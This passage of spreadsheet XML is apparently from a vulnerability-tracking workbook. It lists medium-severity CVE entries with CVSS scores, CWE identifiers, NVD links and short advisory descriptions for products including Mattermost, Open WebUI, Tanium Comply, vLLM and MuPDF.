      <c r="P1346" s="5" t="inlineStr"/>
      <c r="Q1346" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R1346" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions &lt;=11.9 11.0.9 11.4.8 11.7.7 10.22.11.0 fail to recover from handler panics, which allows an authenticated user to crash the plugin via a post-action request with an unexpected field type.. Mattermost Advisory ID: MMSA-2026-00701</t>
        </is>
      </c>
      <c r="S1346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86348</t>
        </is>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1347" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86349</t>
        </is>
      </c>
      <c r="D1347" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1347" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1347" s="5" t="inlineStr"/>
      <c r="H1347" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1347" s="5" t="inlineStr"/>
      <c r="J1347" s="5" t="inlineStr"/>
      <c r="K1347" s="5" t="inlineStr"/>
      <c r="L1347" s="5" t="inlineStr"/>
      <c r="M1347" s="5" t="inlineStr"/>
      <c r="N1347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1347" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1347" s="5" t="inlineStr"/>
      <c r="Q1347" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R1347" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.8, 10.11.x &lt;= 10.11.22 fail to limit the nesting depth in the server-side Markdown parser which allows an authenticated attacker to cause a denial of service (CPU resource exhaustion) via a crafted post containing deeply nested blockquotes or list items.. Mattermost Advisory ID: MMSA-2026-00707</t>
        </is>
      </c>
      <c r="S1347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86349</t>
        </is>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1348" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86769</t>
        </is>
      </c>
      <c r="D1348" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1348" s="5" t="inlineStr"/>
      <c r="H1348" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1348" s="5" t="inlineStr"/>
      <c r="J1348" s="5" t="inlineStr"/>
      <c r="K1348" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1348" s="5" t="inlineStr"/>
      <c r="M1348" s="5" t="inlineStr"/>
      <c r="N1348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1348" s="5" t="inlineStr"/>
      <c r="Q1348" s="5" t="inlineStr">
        <is>
          <t>CWE-282</t>
        </is>
      </c>
      <c r="R1348" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain an improper ownership management vulnerability in the consumables checkout API endpoint that records the checkout target user's id in the created_by column instead of the authenticated caller's id. Authenticated attackers with consumables.checkout permission can perform checkouts that result in misattributed audit trail entries in the consumables_users pivot table, obscuring which operator performed the action.</t>
        </is>
      </c>
      <c r="S1348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86769</t>
        </is>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1349" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87017</t>
        </is>
      </c>
      <c r="D1349" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1349" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1349" s="5" t="inlineStr"/>
      <c r="H1349" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1349" s="5" t="inlineStr"/>
      <c r="J1349" s="5" t="inlineStr"/>
      <c r="K1349" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1349" s="5" t="inlineStr"/>
      <c r="M1349" s="5" t="inlineStr"/>
      <c r="N1349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1349" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1349" s="5" t="inlineStr"/>
      <c r="Q1349" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="R1349" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.7.0 until 0.11.1, the built-in knowledge search tool passed the caller's readable knowledge identifiers through a metadata filter, but the search methods in eleven shipped vector backends ignored that filter. An authenticated user on an affected backend could enumerate the identifiers, names, and descriptions of inaccessible knowledge bases from the shared collection, although the associated document text remained in separate collections. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87017</t>
        </is>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1350" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87019</t>
        </is>
      </c>
      <c r="D1350" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1350" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1350" s="5" t="inlineStr"/>
      <c r="H1350" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1350" s="5" t="inlineStr"/>
      <c r="J1350" s="5" t="inlineStr"/>
      <c r="K1350" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1350" s="5" t="inlineStr"/>
      <c r="M1350" s="5" t="inlineStr"/>
      <c r="N1350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1350" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1350" s="5" t="inlineStr"/>
      <c r="Q1350" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1350" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87019</t>
        </is>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1351" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87035</t>
        </is>
      </c>
      <c r="D1351" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1351" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1351" s="5" t="inlineStr"/>
      <c r="H1351" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1351" s="5" t="inlineStr"/>
      <c r="J1351" s="5" t="inlineStr"/>
      <c r="K1351" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1351" s="5" t="inlineStr"/>
      <c r="M1351" s="5" t="inlineStr"/>
      <c r="N1351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1351" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1351" s="5" t="inlineStr"/>
      <c r="Q1351" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1351" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an information disclosure vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87035</t>
        </is>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1352" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87046</t>
        </is>
      </c>
      <c r="D1352" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1352" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1352" s="5" t="inlineStr"/>
      <c r="H1352" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1352" s="5" t="inlineStr"/>
      <c r="J1352" s="5" t="inlineStr"/>
      <c r="K1352" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1352" s="5" t="inlineStr"/>
      <c r="M1352" s="5" t="inlineStr"/>
      <c r="N1352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1352" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1352" s="5" t="inlineStr"/>
      <c r="Q1352" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1352" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87046</t>
        </is>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1353" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87994</t>
        </is>
      </c>
      <c r="D1353" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1353" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1353" s="5" t="inlineStr"/>
      <c r="H1353" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1353" s="5" t="inlineStr"/>
      <c r="J1353" s="5" t="inlineStr"/>
      <c r="K1353" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1353" s="5" t="inlineStr"/>
      <c r="M1353" s="5" t="inlineStr"/>
      <c r="N1353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1353" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1353" s="5" t="inlineStr"/>
      <c r="Q1353" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R1353" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.5 until 0.11.1, the channel branch of chat_completion in backend/open_webui/main.py checked channel write access and channel membership for a supplied message_id but did not verify that the calling user authored the targeted message. A channel member could use the chat completions endpoint to replace another member's message while preserving the victim as the stored author, altering the conversation record without gaining access to other channels. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87994</t>
        </is>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1354" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87997</t>
        </is>
      </c>
      <c r="D1354" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1354" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1354" s="5" t="inlineStr"/>
      <c r="H1354" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1354" s="5" t="inlineStr"/>
      <c r="J1354" s="5" t="inlineStr"/>
      <c r="K1354" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1354" s="5" t="inlineStr"/>
      <c r="M1354" s="5" t="inlineStr"/>
      <c r="N1354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1354" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1354" s="5" t="inlineStr"/>
      <c r="Q1354" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R1354" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, POST /api/chat/completions and POST /api/v1/chat/completions in backend/open_webui/main.py copied a client-supplied folder_id into a new chat without applying the folder write-access check used by the dedicated chat routes. An authenticated user who knew a shared folder identifier could inject an attacker-controlled chat into a folder where the user had read-only or no write access, causing the entry to appear to authorized folder readers. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87997</t>
        </is>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89029</t>
        </is>
      </c>
      <c r="D1355" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1355" s="5" t="inlineStr"/>
      <c r="H1355" s="5" t="inlineStr"/>
      <c r="I1355" s="5" t="inlineStr"/>
      <c r="J1355" s="5" t="inlineStr"/>
      <c r="K1355" s="5" t="inlineStr"/>
      <c r="L1355" s="5" t="inlineStr"/>
      <c r="M1355" s="5" t="inlineStr"/>
      <c r="N1355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1355" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1355" s="5" t="inlineStr"/>
      <c r="Q1355" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1355" s="5" t="inlineStr">
        <is>
          <t>Adenion Blog2Social plugin for WordPress before 9.1.0 allows low-privileged users to enumerate WordPress user accounts. The b2s_get_select_mandant_user AJAX handler in includes/Ajax/Get.php resolves arbitrary user IDs supplied in the owner parameter to display names without verifying that the caller is authorized to read user account data, allowing any user with the edit_posts capability to map WordPress user IDs to display names and confirm account existence for arbitrary IDs.</t>
        </is>
      </c>
      <c r="S1355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89029</t>
        </is>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1356" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89321</t>
        </is>
      </c>
      <c r="D1356" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1356" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G1356" s="5" t="inlineStr"/>
      <c r="H1356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1356" s="5" t="inlineStr"/>
      <c r="J1356" s="5" t="inlineStr"/>
      <c r="K1356" s="5" t="inlineStr"/>
      <c r="L1356" s="5" t="inlineStr"/>
      <c r="M1356" s="5" t="inlineStr"/>
      <c r="N1356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1356" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1356" s="5" t="inlineStr"/>
      <c r="Q1356" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R1356" s="5" t="inlineStr">
        <is>
          <t>Publishing limits the compressed size of a VSIX (ovsx.publishing.max-content-size, 512 MB by default) but nothing limited how large an entry becomes when opened.
On the first request to /vscode/unpkg/{namespace}/{extension}/{version}/{path}, WebResourceService opened the entry with ZipFile.getInputStream() and passed the decompressed stream to Files.copy(), which ran to the end of the stream without counting bytes written. The result was cached under java.io.tmpdir, and that cache evicted by entry count (150), not by size, so it placed no bound on disk usage.
A publisher with access only to their own namespace could therefore upload a small, highly compressible VSIX and cause the server to write far larger files to the temp filesystem — repeating with different files or versions, since a repeat request is served from the cache.
Impact observed: the temp filesystem filled; requests for files not already cached returned 500 with No space left on device; a failed extraction left a partial cache file that blocked later attempts at that path; publishing failed with Failed to read extension file. Metadata and already-cached files kept working, and the server did not stop.
Triggering the extraction needs no authentication — only the upload does.</t>
        </is>
      </c>
      <c r="S1356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89321</t>
        </is>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92141</t>
        </is>
      </c>
      <c r="D1357" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1357" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1357" s="5" t="inlineStr"/>
      <c r="H1357" s="5" t="inlineStr"/>
      <c r="I1357" s="5" t="inlineStr"/>
      <c r="J1357" s="5" t="inlineStr">
        <is>
          <t>jenkins, keycloak</t>
        </is>
      </c>
      <c r="K1357" s="5" t="inlineStr"/>
      <c r="L1357" s="5" t="inlineStr"/>
      <c r="M1357" s="5" t="inlineStr"/>
      <c r="N1357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1357" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1357" s="5" t="inlineStr"/>
      <c r="Q1357" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1357" s="5" t="inlineStr">
        <is>
          <t>Jenkins Keycloak Authentication Plugin 2.4.1 and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks.</t>
        </is>
      </c>
      <c r="S1357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92141</t>
        </is>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92357</t>
        </is>
      </c>
      <c r="D1358" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1358" s="5" t="inlineStr"/>
      <c r="H1358" s="5" t="inlineStr"/>
      <c r="I1358" s="5" t="inlineStr"/>
      <c r="J1358" s="5" t="inlineStr"/>
      <c r="K1358" s="5" t="inlineStr"/>
      <c r="L1358" s="5" t="inlineStr"/>
      <c r="M1358" s="5" t="inlineStr"/>
      <c r="N1358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1358" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1358" s="5" t="inlineStr"/>
      <c r="Q1358" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="R1358" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in a2ui-project a2ui 0.8/0.9/1.0. Impacted is an unknown function of the file model-processor.ts of the component Model Processor. The manipulation of the argument current[segment] leads to information disclosure. The attack may be initiated remotely. The identifier of the patch is 1b3bff234661ce922cbc3771be642b23ec9fd0fa. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="S1358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92357</t>
        </is>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92363</t>
        </is>
      </c>
      <c r="D1359" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1359" s="5" t="inlineStr"/>
      <c r="H1359" s="5" t="inlineStr"/>
      <c r="I1359" s="5" t="inlineStr"/>
      <c r="J1359" s="5" t="inlineStr"/>
      <c r="K1359" s="5" t="inlineStr"/>
      <c r="L1359" s="5" t="inlineStr"/>
      <c r="M1359" s="5" t="inlineStr"/>
      <c r="N1359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1359" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1359" s="5" t="inlineStr"/>
      <c r="Q1359" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="R1359" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ag-ui-protocol ag-ui 1.0. Affected is an unknown function of the file src/stream/sse_parser.cpp of the component JSON Parser. Executing a manipulation can lead to resource consumption. The attack may be performed from remote. This patch is called ab6e0bc298996caac2b4b0b3ec0bd8d32a15a186. Applying a patch is advised to resolve this issue.</t>
        </is>
      </c>
      <c r="S1359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92363</t>
        </is>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92365</t>
        </is>
      </c>
      <c r="D1360" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1360" s="5" t="inlineStr"/>
      <c r="H1360" s="5" t="inlineStr"/>
      <c r="I1360" s="5" t="inlineStr"/>
      <c r="J1360" s="5" t="inlineStr"/>
      <c r="K1360" s="5" t="inlineStr"/>
      <c r="L1360" s="5" t="inlineStr"/>
      <c r="M1360" s="5" t="inlineStr"/>
      <c r="N1360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1360" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1360" s="5" t="inlineStr"/>
      <c r="Q1360" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-407</t>
        </is>
      </c>
      <c r="R1360" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in vllm-project vllm up to 0.29.0. Affected by this issue is some unknown functionality of the file vllm/v1/sample/thinking_budget_state.py. The manipulation results in inefficient algorithmic complexity. It is possible to launch the attack remotely. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="S1360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92365</t>
        </is>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92413</t>
        </is>
      </c>
      <c r="D1361" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1361" s="5" t="inlineStr"/>
      <c r="H1361" s="5" t="inlineStr"/>
      <c r="I1361" s="5" t="inlineStr"/>
      <c r="J1361" s="5" t="inlineStr"/>
      <c r="K1361" s="5" t="inlineStr"/>
      <c r="L1361" s="5" t="inlineStr"/>
      <c r="M1361" s="5" t="inlineStr"/>
      <c r="N1361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1361" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1361" s="5" t="inlineStr"/>
      <c r="Q1361" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="R1361" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Artifex MuPDF up to b6d17493700c621c0e70036980a6ebd06d2202c9. Affected by this vulnerability is the function pdf_open_filter of the file pdf-stream.c of the component PDF Xref Loading. Executing a manipulation can lead to null pointer dereference. The attack can be launched remotely. The exploit has been published and may be used. This patch is called 3df1e30f9d7b77260e13bd0dbe1928ddeba8386e. Applying a patch is advised to resolve this issue.</t>
        </is>
      </c>
      <c r="S1361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92413</t>
        </is>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92416</t>
        </is>
      </c>
      <c r="D1362" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1362" s="5" t="inlineStr"/>
      <c r="H1362" s="5" t="inlineStr"/>
      <c r="I1362" s="5" t="inlineStr"/>
      <c r="J1362" s="5" t="inlineStr"/>
      <c r="K1362" s="5" t="inlineStr"/>
      <c r="L1362" s="5" t="inlineStr"/>
      <c r="M1362" s="5" t="inlineStr"/>
      <c r="N1362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1362" s="5" t="inlineStr">
        <is>
